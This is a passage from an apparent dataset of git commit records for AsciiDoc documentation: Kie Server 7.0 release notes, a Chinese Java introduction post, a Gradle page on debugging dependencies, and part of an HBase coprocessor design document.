6.x\n\n== ServiceResponse XStream marshalling changes\n\nNOTE: This release note applies only when directly interfacing with the Kie Server (kie-server) API, not when using the Kie Server Java Client (kie-server-client) API.\n\nIn an effort to be more consistent with JAXB marshalling, XStream marshalling has undergone the following changes:\n\n- The XML ServiceResponse element's `response` object no longer renders with the canonical name.\n- XStream now uses `type` and `msg` as attributes, not child elements.\n\nFor more details, see https:\/\/issues.jboss.org\/browse\/DROOLS-1509[DROOLS-1509].\n\n== Simplified Planner REST API\n\n=== ServiceResponse wrapper removal\n`ServiceResponse` wrapper has been removed from Planner service responses returned by KIE Server.\nThis allows an easier processing of the responses on the client side.\n\n[source,xml,options=\"nowrap\"]\n----\n<solver-instance>\n ...\n <status>SOLVING<\/status>\n <score scoreClass=\"org.optaplanner.core.api.score.buildin.hardsoft.HardSoftScore\">0hard\/-10soft<\/score>\n <best-solution class=\"curriculumcourse.curriculumcourse.CourseSchedule\">\n ...\n <\/best-solution>\n<\/solver-instance>\n----\n\n=== New Planner API overview\n\nRegister a solver:\n\n- PUT http:\/\/${kie-server}\/services\/rest\/server\/containers\/${container_id}\/solvers\/${solver_id}\n\nSubmit a solution:\n\n- POST http:\/\/${kie-server}\/services\/rest\/server\/containers\/${container_id}\/solvers\/${solver_id}\/state\/solving\n\nGet the best solution:\n\n- GET http:\/\/${kie-server}\/services\/rest\/server\/containers\/${container_id}\/solvers\/${solver_id}\/bestsolution\n\nTerminate a solver:\n\n- POST http:\/\/${kie-server}\/services\/rest\/server\/containers\/${container_id}\/solvers\/${solver_id}\/state\/terminating-early\n\nDispose a solver:\n\n- DELETE http:\/\/${kie-server}\/services\/rest\/server\/containers\/${container_id}\/solvers\/${solver_id}","old_contents":"[[_kieserver.releasenoteskie.7.0.0]]\n= Breaking changes in Kie Server 7.0 from 6.x\n\n== ServiceResponse XStream marshalling changes\n\nNOTE: This release note applies only when directly interfacing with the Kie Server (kie-server) API, not when using the Kie Server Java Client (kie-server-client) API.\n\nIn an effort to be more consistent with JAXB marshalling, XStream marshalling has undergone the following changes:\n\n- The XML ServiceResponse element's `response` object no longer renders with the canonical name.\n- XStream now uses `type` and `msg` as attributes, not child elements.\n\nFor more details, see https:\/\/issues.jboss.org\/browse\/DROOLS-1509[DROOLS-1509].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e77574d07531936a8edbf6dcae8cde6ae7881cc5","subject":"Update 2019-01-31-java-language.adoc","message":"Update 2019-01-31-java-language.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-java-language.adoc","new_file":"_posts\/2019-01-31-java-language.adoc","new_contents":"= Java \u8bed\u8a00\n:hp-image: \/covers\/cover.png\n:published_at: 2019-01-31\n:hp-tags: Java,\n:hp-alt-title: java language\n\n== \u57fa\u7840\n=== \u9762\u5411\u5bf9\u8c61\u7f16\u7a0b\u6982\u5ff5\n\u6838\u5fc3\u6982\u5ff5\uff1a\n\n* \u5bf9\u8c61\n* \u6d88\u606f\uff08messages\uff09\n* \u7c7b\n* \u7ee7\u627f\n\n* \u4e0e\u73b0\u5b9e\u7684\u5173\u8054\n* \u8bed\u6cd5\n\n==== \u5bf9\u8c61\n\u5bf9\u8c61\u662f\u9762\u5411\u5bf9\u8c61\u6280\u672f\u7684\u5173\u952e\uff0c\u5e38\u7528\u4e8e\u5bf9\u73b0\u5b9e\u4e8b\u7269\u5efa\u6a21\uff0c\u662f\u5176\u76f8\u5173\u7684\u72b6\u6001\u4e0e\u884c\u4e3a\u7684\u8f6f\u4ef6\u5c01\u88c5\u3002\n\n. \u7406\u89e3\u73b0\u5b9e\u4e16\u754c\n\u73b0\u5b9e\u4e8b\u7269\u90fd\u80fd\u88ab\u5206\u5272\u4e3a\u4e24\u4e2a\u7279\u5f81\uff1a\u72b6\u6001(state)\u3001\u884c\u4e3a(behavior)\uff0c\u5b66\u4e60\u9762\u5411\u5bf9\u8c61\u7f16\u7a0b\u7684\u597d\u65b9\u6cd5\u4fbf\u662f\u8fa8\u8bc6\u4f60\u80fd\u60f3\u5230\u7684\u6bcf\u4e2a\u4e8b\u7269\u7684\u72b6\u6001\u4e0e\u884c\u4e3a\u3002\u6216\u8bb8\u4f60\u4f1a\u53d1\u73b0\u4e00\u4e9b\u590d\u6742\u6027\uff0c\u6709\u7684\u4e8b\u7269\u80fd\u591f\u56ca\u62ec\u5176\u4ed6\u4e8b\u7269\u7684\u72b6\u6001\u4e0e\u884c\u4e3a\u3002\n\n. \u8fdb\u5165\u4ee3\u7801\u4e16\u754c\n\u73b0\u5b9e\u4e16\u754c\u7684\u72b6\u6001\u4e0e\u884c\u4e3a\u5bf9\u5e94\u4ee3\u7801\u4e16\u754c\u7684\u65b9\u6cd5(Methods)\u4e0e\u5b57\u6bb5(Fields)\n\n* \u72b6\u6001\u4e0e\u884c\u4e3a\u5982\u4f55\u7528\u5bf9\u8c61\u8868\u793a\n* \u6570\u636e\u5c01\u88c5\n* \u4f7f\u7528\u5bf9\u8c61\u7684\u76ca\u5904\n\n\n\n\n","old_contents":"= Java \u8bed\u8a00\n:hp-image: \/covers\/cover.png\n:published_at: 2019-01-31\n:hp-tags: Java,\n:hp-alt-title: java language\n\n== \u57fa\u7840\n=== \u9762\u5411\u5bf9\u8c61\u7f16\u7a0b\u6982\u5ff5\n\u6838\u5fc3\u6982\u5ff5\uff1a\n\n* \u5bf9\u8c61\n* \u6d88\u606f\uff08messages\uff09\n* \u7c7b\n* \u7ee7\u627f\n\n* \u4e0e\u73b0\u5b9e\u7684\u5173\u8054\n* \u8bed\u6cd5\n\n==== \u5bf9\u8c61\n\u5bf9\u8c61\u5e38\u7528\u4e8e\u5bf9\u73b0\u5b9e\u5b58\u5728\u5efa\u6a21\uff0c\u662f\u5176\u76f8\u5173\u7684\u72b6\u6001\u4e0e\u884c\u4e3a\u7684\u8f6f\u4ef6\u5c01\u88c5\u3002\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"5cf0d1079823475da996b8f9868a5a70617aa432","subject":"Remove link to deleted section in docs","message":"Remove link to deleted section in docs\n","repos":"gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/dep-man\/01-core-dependency-management\/viewing_debugging_dependencies.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/dep-man\/01-core-dependency-management\/viewing_debugging_dependencies.adoc","new_contents":"[[viewing-debugging-dependencies]]\n[[sec:debugging-build-scans]]\n= View and Debug Dependencies\n\nGradle provides tooling to navigate dependency graphs and mitigate link:https:\/\/en.wikipedia.org\/wiki\/Dependency_hell[dependency hell].\nUsers can render the full graph of dependencies as well as identify the selection reason and origin for a dependency.\nDependencies can originate through build script declared dependencies or transitive dependencies.\nYou can visualize dependencies with:\n\n- the built-in Gradle CLI `dependencies` task\n- the built-in Gradle CLI `dependencyInsight` task\n- link:https:\/\/scans.gradle.com\/[build scans]\n\n[[sec:listing_dependencies]]\n== List Project Dependencies\n\nGradle provides the built-in `dependencies` task to render a dependency tree from the command line.\nBy default, the dependency tree renders dependencies for all <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,configurations>> within a <<command_line_interface#executing_tasks_in_multi_project_builds,single project>>.\nThe dependency tree indicates the selected version of each dependency.\nIt also displays information about dependency conflict resolution.\n\nThe `dependencies` task can be especially helpful for issues related to transitive dependencies.\nYour build file lists direct dependencies, but the `dependencies` task can help you understand which transitive dependencies resolve during your build.\n\n=== Output Annotations\n\nThe `dependencies` task marks dependency trees with the following annotations:\n\n- `(*)`: Indicates repeated occurrences of a transitive dependency subtree. Gradle expands transitive dependency subtrees only once per project; repeat occurrences only display the root of the subtree, followed by this annotation.\n- `(c)`: This element is a <<dependency_constraints.adoc#sec:direct-vs-transitive-deps,dependency constraint>>, not a dependency. Look for the matching dependency elsewhere in the tree.\n- `(n)`: A dependency or dependency configuration that <<declaring_dependencies.adoc#sec:resolvable-consumable-configs,cannot be resolved>>.\n\n=== Specify a Dependency Configuration\n\nTo focus on the information about one dependency configuration, provide the optional parameter `--configuration`.\nJust like <<command_line_interface#sec:name_abbreviation, project and task names>>, Gradle accepts abbreviated names to select a dependency configuration.\nFor example, you can specify `tRC` instead of `testRuntimeClasspath` if the pattern matches to a single dependency configuration.\nBoth of the following examples show dependencies in the `testRuntimeClasspath` dependency configuration of a Java project:\n\n----\n> gradle -q dependencies --configuration testRuntimeClasspath\n----\n\n----\n> gradle -q dependencies --configuration tRC\n----\n\nTo see a list of all the configurations available in a project, including those added by any plugins, you can run a `resolvableConfigurations` report.\n\nFor more info, see that plugin's documentation (for instance, the Java Plugin is documented <<java_plugin.adoc#sec:java_plugin_and_dependency_management,here>>).\n\n=== Example\n\nConsider a project that uses the link:https:\/\/www.eclipse.org\/jgit\/[JGit library] to execute Source Control Management (SCM) operations for a release process.\nYou can declare dependencies for external tooling with the help of a <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,custom dependency configuration>>.\nThis avoids polluting other contexts, such as the compilation classpath for your production source code.\n\nThe following example declares a custom dependency configuration named \"scm\" that contains the JGit dependency:\n\n====\ninclude::sample[dir=\"snippets\/dependencyManagement\/inspectingDependencies-dependenciesReport\/groovy\",files=\"build.gradle[tags=dependency-declaration]\"]\ninclude::sample[dir=\"snippets\/dependencyManagement\/inspectingDependencies-dependenciesReport\/kotlin\",files=\"build.gradle.kts[tags=dependency-declaration]\"]\n====\n\n\nUse the following command to view a dependency tree for the `scm` dependency configuration:\n\n----\n> gradle -q dependencies --configuration scm\ninclude::{snippetsPath}\/dependencyManagement\/inspectingDependencies-dependenciesReport\/tests\/dependencyReport.out[]\n----\n\n[[sec:identifying_reason_dependency_selection]]\n== Identify the Dependency Version Selected\n\nA project may request two different versions of the same dependency either directly or transitively.\nGradle applies <<dependency_resolution.adoc#sec:version-conflict,version conflict resolution>> to ensure that only one version of the dependency exists in the dependency graph.\nThe following example introduces a conflict with `commons-codec:commons-codec`, added both as a direct dependency and a transitive dependency of JGit:\n\n====\ninclude::sample[dir=\"snippets\/dependencyManagement\/inspectingDependencies-dependencyInsightReport\/groovy\",files=\"build.gradle[tags=dependency-declaration]\"]\ninclude::sample[dir=\"snippets\/dependencyManagement\/inspectingDependencies-dependencyInsightReport\/kotlin\",files=\"build.gradle.kts[tags=dependency-declaration]\"]\n====\n\nThe dependency tree in a link:https:\/\/scans.gradle.com\/[build scan] shows information about conflicts.\nClick on a dependency and select the \"Required By\" tab to see the selection reason and origin of the dependency.\n\nimage::dependency-management-dependency-insight-report-build-scan.png[]\n\n=== Dependency Insights\n\nGradle provides the built-in `dependencyInsight` task to render a _dependency insight report_ from the command line.\nDependency insights provide information about a single dependency within a single <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,configuration>>.\nGiven a dependency, you can identify the selection reason and origin.\n\n`dependencyInsight` accepts the following parameters:\n\n`--dependency <dependency>` (mandatory)::\nThe dependency to investigate.\nYou can supply a complete `group:name`, or part of it.\nIf multiple dependencies match, Gradle generates a report covering all matching dependencies.\n`--configuration <name>` (mandatory)::\nThe dependency configuration which resolves the given dependency.\nThis parameter is optional for projects that use the <<java_plugin#java_plugin, Java plugin>>, since the plugin provides a default value of `compileClasspath`.\n`--single-path` (optional)::\nRender only a single path to the dependency.\n\nThe following code snippet demonstrates how to run a dependency insight report for all paths to a dependency named \"commons-codec\" within the \"scm\" configuration:\n\n----\n> gradle -q dependencyInsight --dependency commons-codec --configuration scm\ninclude::{snippetsPath}\/dependencyManagement\/inspectingDependencies-dependencyInsightReport\/tests\/dependencyInsightReport.out[]\n----\n\nFor more information about configurations, see the <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,dependency configuration documentation>>.\n\n==== Selection Reasons\n\nThe \"Selection reasons\" section of the dependency insight report lists the reasons why a dependency was selected.\nHave a look at the table below to understand the meaning of the different terms used:\n\n.Terminology\n[%header%autowidth,compact]\n|===\n| Reason | Meaning\n\n| (Absent)\n| No reason other than a reference, direct or transitive, was present.\n\n| Was requested : <text>\n| The dependency appears in the graph, and the inclusion came with a <<declaring_dependencies#sec:documenting-dependencies, `because` text>>.\n\n| Was requested : didn't match versions <versions>\n| The dependency appears with a <<dynamic_versions#sub:declaring_dependency_with_dynamic_version, dynamic version>> which did not include the listed versions.\nMay be followed by a `because` text.\n\n| Was requested : reject version <versions>\n| The dependency appears with a <<rich_versions#rich-version-constraints, rich version>> containing one or more `reject`.\nMay be followed by a `because` text.\n\n| By conflict resolution : between versions <version>\n| The dependency appeared multiple times, with different version requests.\nThis resulted in <<dependency_resolution#sec:version-conflict, conflict resolution>> to select the most appropriate version.\n\n| By constraint\n| A <<dependency_constraints#sec:adding-constraints-transitive-deps, dependency constraint>> participated in the version selection.\nMay be followed by a `because` text.\n\n| By ancestor\n| There is a <<rich_versions#rich-version-constraints, rich version>> with a `strictly` which enforces the version of this dependency.\n\n| Selected by rule\n| A <<resolution_rules#resolution_rules, dependency resolution rule>> overruled the default selection process.\nMay be followed by a `because` text.\n\n| Rejection : <version> by rule because <text>\n| A `ComponentSelection.reject` link:{groovyDslPath}\/org.gradle.api.artifacts.ComponentSelection.html#org.gradle.api.artifacts.ComponentSelection:reject(java.lang.String)[rejected the given version] of the dependency.\n\n| Rejection: version <version>: <attributes information>\n| The dependency has a dynamic version and some versions did not match the <<variant_model#sec:variant-aware-matching, requested attributes>>.\n\n| Forced\n| The build enforces the version of the dependency through an enforced platform or resolution strategy.\n|===\n\nIf multiple selection reasons exist, the insight report lists all of them.\n\n== Troubleshooting\n\n[[sec:resolving-version-conflict]]\n=== Version Conflicts\n\nIf the selected version does not match your expectation, Gradle offers a series of tools to help you <<dependency_constraints.adoc#dependency-constraints,control transitive dependencies>>.\n\n[[sec:resolving-variant-aware-errors]]\n=== Variant Selection Errors\n\nSometimes a selection error happens at the <<variant_model.adoc#understanding-variant-selection,variant selection level>>.\nHave a look at the <<variant_model.adoc#sec:variant-select-errors,dedicated section>> to understand these errors and how to resolve them.\n\n[[sub:resolving-unsafe-configuration-resolution-errors]]\n=== Unsafe Configuration Resolution Errors\n\nResolving a configuration can have side effects on Gradle's project model.\nAs a result, Gradle must manage access to each project's configurations.\nThere are a number of ways a configuration might be resolved unsafely.\nFor example:\n\n* A task from one project directly resolves a configuration in another project in the task's action.\n* A task specifies a configuration from another project as an input file collection.\n* A build script for one project resolves a configuration in another project during evaluation.\n* Project configurations are resolved in the settings file.\n\nGradle produces a deprecation warning for each unsafe access.\nUnsafe access can cause indeterminate errors.\nYou should <<command_line_interface.adoc#sec:command_line_warnings,fix unsafe access warnings>> in your build.\n\nIn most cases, you can resolve unsafe accesses by creating a cross-project dependency on the other project.\nSee the documentation for <<cross_project_publications.adoc#cross_project_publications, sharing outputs between projects>> for more information.\n\nIf you find a use case that can't be resolved using these techniques, please let us know by filing a https:\/\/github.com\/gradle\/gradle\/issues[GitHub Issue].\n","old_contents":"[[viewing-debugging-dependencies]]\n[[sec:debugging-build-scans]]\n= View and Debug Dependencies\n\nGradle provides tooling to navigate dependency graphs and mitigate link:https:\/\/en.wikipedia.org\/wiki\/Dependency_hell[dependency hell].\nUsers can render the full graph of dependencies as well as identify the selection reason and origin for a dependency.\nDependencies can originate through build script declared dependencies or transitive dependencies.\nYou can visualize dependencies with:\n\n- the built-in Gradle CLI `dependencies` task\n- the built-in Gradle CLI `dependencyInsight` task\n- link:https:\/\/scans.gradle.com\/[build scans]\n\n[[sec:listing_dependencies]]\n== List Project Dependencies\n\nGradle provides the built-in `dependencies` task to render a dependency tree from the command line.\nBy default, the dependency tree renders dependencies for all <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,configurations>> within a <<command_line_interface#executing_tasks_in_multi_project_builds,single project>>.\nThe dependency tree indicates the selected version of each dependency.\nIt also displays information about dependency conflict resolution.\n\nThe `dependencies` task can be especially helpful for issues related to transitive dependencies.\nYour build file lists direct dependencies, but the `dependencies` task can help you understand which transitive dependencies resolve during your build.\n\n=== Output Annotations\n\nThe `dependencies` task marks dependency trees with the following annotations:\n\n- `(*)`: Indicates repeated occurrences of a transitive dependency subtree. Gradle expands transitive dependency subtrees only once per project; repeat occurrences only display the root of the subtree, followed by this annotation.\n- `(c)`: This element is a <<dependency_constraints.adoc#sec:direct-vs-transitive-deps,dependency constraint>>, not a dependency. Look for the matching dependency elsewhere in the tree.\n- `(n)`: A dependency or dependency configuration that <<declaring_dependencies.adoc#sec:resolvable-consumable-configs,cannot be resolved>>.\n\n=== Specify a Dependency Configuration\n\nTo focus on the information about one dependency configuration, provide the optional parameter `--configuration`.\nJust like <<command_line_interface#sec:name_abbreviation, project and task names>>, Gradle accepts abbreviated names to select a dependency configuration.\nFor example, you can specify `tRC` instead of `testRuntimeClasspath` if the pattern matches to a single dependency configuration.\nBoth of the following examples show dependencies in the `testRuntimeClasspath` dependency configuration of a Java project:\n\n----\n> gradle -q dependencies --configuration testRuntimeClasspath\n----\n\n----\n> gradle -q dependencies --configuration tRC\n----\n\nTo see a list of all the configurations available in a project, including those added by any plugins, you can run a `resolvableConfigurations` report.\n\nFor more info, see that plugin's documentation (for instance, the Java Plugin is documented <<java_plugin.adoc#sec:java_plugin_and_dependency_management,here>>).\n\n=== Example\n\nConsider a project that uses the link:https:\/\/www.eclipse.org\/jgit\/[JGit library] to execute Source Control Management (SCM) operations for a release process.\nYou can declare dependencies for external tooling with the help of a <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,custom dependency configuration>>.\nThis avoids polluting other contexts, such as the compilation classpath for your production source code.\n\nThe following example declares a custom dependency configuration named \"scm\" that contains the JGit dependency:\n\n====\ninclude::sample[dir=\"snippets\/dependencyManagement\/inspectingDependencies-dependenciesReport\/groovy\",files=\"build.gradle[tags=dependency-declaration]\"]\ninclude::sample[dir=\"snippets\/dependencyManagement\/inspectingDependencies-dependenciesReport\/kotlin\",files=\"build.gradle.kts[tags=dependency-declaration]\"]\n====\n\n\nUse the following command to view a dependency tree for the `scm` dependency configuration:\n\n----\n> gradle -q dependencies --configuration scm\ninclude::{snippetsPath}\/dependencyManagement\/inspectingDependencies-dependenciesReport\/tests\/dependencyReport.out[]\n----\n\n[[sec:identifying_reason_dependency_selection]]\n== Identify the Dependency Version Selected\n\nA project may request two different versions of the same dependency either directly or transitively.\nGradle applies <<dependency_resolution.adoc#sec:version-conflict,version conflict resolution>> to ensure that only one version of the dependency exists in the dependency graph.\nThe following example introduces a conflict with `commons-codec:commons-codec`, added both as a direct dependency and a transitive dependency of JGit:\n\n====\ninclude::sample[dir=\"snippets\/dependencyManagement\/inspectingDependencies-dependencyInsightReport\/groovy\",files=\"build.gradle[tags=dependency-declaration]\"]\ninclude::sample[dir=\"snippets\/dependencyManagement\/inspectingDependencies-dependencyInsightReport\/kotlin\",files=\"build.gradle.kts[tags=dependency-declaration]\"]\n====\n\nThe dependency tree in a link:https:\/\/scans.gradle.com\/[build scan] shows information about conflicts.\nClick on a dependency and select the \"Required By\" tab to see the selection reason and origin of the dependency.\n\nimage::dependency-management-dependency-insight-report-build-scan.png[]\n\n=== Dependency Insights\n\nGradle provides the built-in `dependencyInsight` task to render a _dependency insight report_ from the command line.\nDependency insights provide information about a single dependency within a single <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,configuration>>.\nGiven a dependency, you can identify the selection reason and origin.\n\n`dependencyInsight` accepts the following parameters:\n\n`--dependency <dependency>` (mandatory)::\nThe dependency to investigate.\nYou can supply a complete `group:name`, or part of it.\nIf multiple dependencies match, Gradle generates a report covering all matching dependencies.\n`--configuration <name>` (mandatory)::\nThe dependency configuration which resolves the given dependency.\nThis parameter is optional for projects that use the <<java_plugin#java_plugin, Java plugin>>, since the plugin provides a default value of `compileClasspath`.\n`--single-path` (optional)::\nRender only a single path to the dependency.\n\nThe following code snippet demonstrates how to run a dependency insight report for all paths to a dependency named \"commons-codec\" within the \"scm\" configuration:\n\n----\n> gradle -q dependencyInsight --dependency commons-codec --configuration scm\ninclude::{snippetsPath}\/dependencyManagement\/inspectingDependencies-dependencyInsightReport\/tests\/dependencyInsightReport.out[]\n----\n\nFor more information about configurations, see the <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,dependency configuration documentation>>.\n\n==== Selection Reasons\n\nThe \"Selection reasons\" section of the dependency insight report lists the reasons why a dependency was selected.\nHave a look at the table below to understand the meaning of the different terms used:\n\n.Terminology\n[%header%autowidth,compact]\n|===\n| Reason | Meaning\n\n| (Absent)\n| No reason other than a reference, direct or transitive, was present.\n\n| Was requested : <text>\n| The dependency appears in the graph, and the inclusion came with a <<declaring_dependencies#sec:documenting-dependencies, `because` text>>.\n\n| Was requested : didn't match versions <versions>\n| The dependency appears with a <<dynamic_versions#sub:declaring_dependency_with_dynamic_version, dynamic version>> which did not include the listed versions.\nMay be followed by a `because` text.\n\n| Was requested : reject version <versions>\n| The dependency appears with a <<rich_versions#rich-version-constraints, rich version>> containing one or more `reject`.\nMay be followed by a `because` text.\n\n| By conflict resolution : between versions <version>\n| The dependency appeared multiple times, with different version requests.\nThis resulted in <<dependency_resolution#sec:version-conflict, conflict resolution>> to select the most appropriate version.\n\n| By constraint\n| A <<dependency_constraints#sec:adding-constraints-transitive-deps, dependency constraint>> participated in the version selection.\nMay be followed by a `because` text.\n\n| By ancestor\n| There is a <<rich_versions#rich-version-constraints, rich version>> with a `strictly` which enforces the version of this dependency.\n\n| Selected by rule\n| A <<resolution_rules#resolution_rules, dependency resolution rule>> overruled the default selection process.\nMay be followed by a `because` text.\n\n| Rejection : <version> by rule because <text>\n| A `ComponentSelection.reject` link:{groovyDslPath}\/org.gradle.api.artifacts.ComponentSelection.html#org.gradle.api.artifacts.ComponentSelection:reject(java.lang.String)[rejected the given version] of the dependency.\n\n| Rejection: version <version>: <attributes information>\n| The dependency has a dynamic version and some versions did not match the <<variant_model#sec:variant-aware-matching, requested attributes>>.\n\n| Forced\n| The build <<dependency_downgrade_and_exclude#forced_dependencies_vs_strict_dependencies, enforces>> the version of the dependency.\n|===\n\nIf multiple selection reasons exist, the insight report lists all of them.\n\n== Troubleshooting\n\n[[sec:resolving-version-conflict]]\n=== Version Conflicts\n\nIf the selected version does not match your expectation, Gradle offers a series of tools to help you <<dependency_constraints.adoc#dependency-constraints,control transitive dependencies>>.\n\n[[sec:resolving-variant-aware-errors]]\n=== Variant Selection Errors\n\nSometimes a selection error happens at the <<variant_model.adoc#understanding-variant-selection,variant selection level>>.\nHave a look at the <<variant_model.adoc#sec:variant-select-errors,dedicated section>> to understand these errors and how to resolve them.\n\n[[sub:resolving-unsafe-configuration-resolution-errors]]\n=== Unsafe Configuration Resolution Errors\n\nResolving a configuration can have side effects on Gradle's project model.\nAs a result, Gradle must manage access to each project's configurations.\nThere are a number of ways a configuration might be resolved unsafely.\nFor example:\n\n* A task from one project directly resolves a configuration in another project in the task's action.\n* A task specifies a configuration from another project as an input file collection.\n* A build script for one project resolves a configuration in another project during evaluation.\n* Project configurations are resolved in the settings file.\n\nGradle produces a deprecation warning for each unsafe access.\nUnsafe access can cause indeterminate errors.\nYou should <<command_line_interface.adoc#sec:command_line_warnings,fix unsafe access warnings>> in your build.\n\nIn most cases, you can resolve unsafe accesses by creating a cross-project dependency on the other project.\nSee the documentation for <<cross_project_publications.adoc#cross_project_publications, sharing outputs between projects>> for more information.\n\nIf you find a use case that can't be resolved using these techniques, please let us know by filing a https:\/\/github.com\/gradle\/gradle\/issues[GitHub Issue].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e0d9095325774d8fab4982ede911356f3b9907f","subject":"HBASE-17730 Add license header to design doc.","message":"HBASE-17730 Add license header to design doc.\n","repos":"HubSpot\/hbase,HubSpot\/hbase,HubSpot\/hbase,HubSpot\/hbase,HubSpot\/hbase,HubSpot\/hbase,HubSpot\/hbase,HubSpot\/hbase,HubSpot\/hbase,HubSpot\/hbase","old_file":"dev-support\/design-docs\/Coprocessor_Design_Improvements-Use_composition_instead_of_inheritance-HBASE-17732.adoc","new_file":"dev-support\/design-docs\/Coprocessor_Design_Improvements-Use_composition_instead_of_inheritance-HBASE-17732.adoc","new_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n= Coprocessor Design Improvements (link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-17732[HBASE-17732])\n\nAuthor: Apekshit Sharma\n\n== Introduction\n\nThis doc explains current design of Coprocessor feature in brief, few issues I noticed, and\nsuggestions on how to fix them & further improve overall design.\n\n*TL;DR* +\nWe are moving from\n\n* Observer *is* Coprocessor\n* FooService *is* CoprocessorService\n\nTo\n\n* Coprocessor *has* Observer\n* Coprocessor *has* Service\n\nSee code example in <<main.design.change.suggestions>>.\n\n== Terminology\n\nhooks = functions in observers. Named because third-party use these functions to \u201chook up\u201d custom\nlogic to internal code paths.\n\n[[background]]\n== Background\n\nCoprocessors are well link:http:\/\/hbase.apache.org\/book.html#cp[documented in the refguide].\n\nHere we give a little background information on involved classes, their responsibilities, and\nrelationship to each other.\n\n* Main classes\n** Coprocessor (interface)\n*** All *Observer* interfaces derive from Coprocessor interface.\n**** Coprocessor Interface is a _Marker _Interface. It just has start\/stop methods and enums for\nstages in the Coprocessor Lifecycle.\n** http:\/\/hbase.apache.org\/book.html#_observer_coprocessors[Observers] (interface)\n*** Contain hooks which third-party programs can override to inject functionality in various\ninternal code paths. For e.g preCreateTable(...) will be called just before any table is created.\n*** Current set of observers: _MasterObserver, RegionObserver, RegionServerObserver, WALObserver,\nEndpointObserver, BulkLoadObserver._\n** CoprocessorEnvironment (interface)\n*** Encapsulates a coprocessor instance and other information like versions, priority, etc.\n*** Coprocessor implementations use it to get access to tables.\n*** Four main implementations: _MasterEnvironment, RegionEnvironment, RegionServerEnvironment,\nWALEnvironment._\n** CoprocessorHost (abstract class)\n*** Responsible for loading coprocessors\n*** Four concrete sub-classes: MasterCoprocessorHost, RegionCoprocessorHost,\nRegionServerCoprocessorHost, WALCoprocessorHost\n*** Each host is tied to corresponding environment type using template argument \u2018E\u2019.\n\n== Problems\n\n* CoprocessorEnvironment has `Coprocessor getInstance()`. Since Observer types which can be\nhandled by an environment are not statically tied to it, coprocessor hosts (which are statically\ntied to Environment) don\u2019t know which kind of coprocessors are relevant to them, i.e.\nMasterCoprocessorHost is tied to MasterEnvironment, but it doesn\u2019t know that it can only handle\nMasterObserver(s). As a result:\n** Problem 1: All hosts load all observers i.e. MasterCoprocessorHost will also load RegionObserver\nand other observers.\n** Problem 2: Hosts use runtime checks likes `observer instanceOf ExpectedObserver` in\nexecOperation and other functions to filter out incompatible observers.\n** Problem 3: Many redundant functions in every implementation of coprocessor host.\n* Observer *extends* Coprocessor (inheritance)\n** Problem 4: Any third-party coprocessor which wants to use many observers will have to extend all\nof them in same class. For eg.\nclass AccessController implements MasterObserver,\n RegionObserver, RegionServerObserver, EndpointObserver,\n BulkLoadObserver, AccessControlService.Interface,\n CoprocessorService\nThat results in big classes with 100+ functions.\n\n== Proposed Solutions\n\n* There are 6 types of observers (listed in <<background>> section above), but just 4 types of\nCoprocessorEnvironment. So some XEnvironment has to be handling multiple Observers\n(RegionEnvironment serves RegionObserver, EndpointObserver and BulkLoadObservers). Our aim is to\nstatically tie environment to types of observers it can serve. There are two alternative choices\nhere:\n** Option 1: Limit to 4 types of Observers. That fits nicely in our pattern-of-4\n(4 hosts, 4 environments, 4 observers) and will make the overall design simpler. Although it may\nlook simple at surface, it\u2019ll actually lead to a single large observer interface which will only\ngrow and may contain 100s of hooks in future (master already has 100+)\n** Option 2: Use multiple observers to group together similar kinds of hooks.\nLike we have RegionObserver, EndpointObserver and BulkLoadObserver; we can have ScannerObserver,\nAMObserver, etc instead of single MasterObserver. Benefits being\n*** Proper encapsulation of related hooks and separation from unrelated hooks\n*** We can give different Stability guarantees for different set of hooks. Something which\u2019ll make\nour CP compat management much easier.\n\nI believe Option 2 to be better than Option 1, and the design changes suggested later are based on\nOption 2.\n\n* For problem 4, we should replace inheritance with composition, so developers have choice to\nbreak out observer implementations into separate classes.\n\n[[main.design.change.suggestions]]\n== Main Design Change suggestions\n\n* Extend pattern-of-4 up to coprocessor.\n+\nCoprocessorHost \u2192 Env \u2192 Coprocessor\n* Tie each CoprocessorEnvironment to corresponding Coprocessor\n* Use composition instead of inheritance between Coprocessor and Observers.\n\n=== Current design\n\nOnly changing parts are mentioned here. Anything not changing is represented by \u201c...\u201d\n\n[source,java]\n----\ninterface Coprocessor {\n ...\n}\n\ninterface CoprocessorEnvironment {\n Coprocessor getInstance();\n ...\n}\n\ninterface CoprocessorService {\n Service getService();\n}\n\nabstract class CoprocessorHost<E extends CoprocessorEnvironment> {\n ...\n}\n\ninterface RegionObserver extends Coprocessor {\n ...\n}\n\ninterface BulkLoadObserver extends Coprocessor {\n ...\n}\n\ninterface EndpointObserver extends Coprocessor {\n 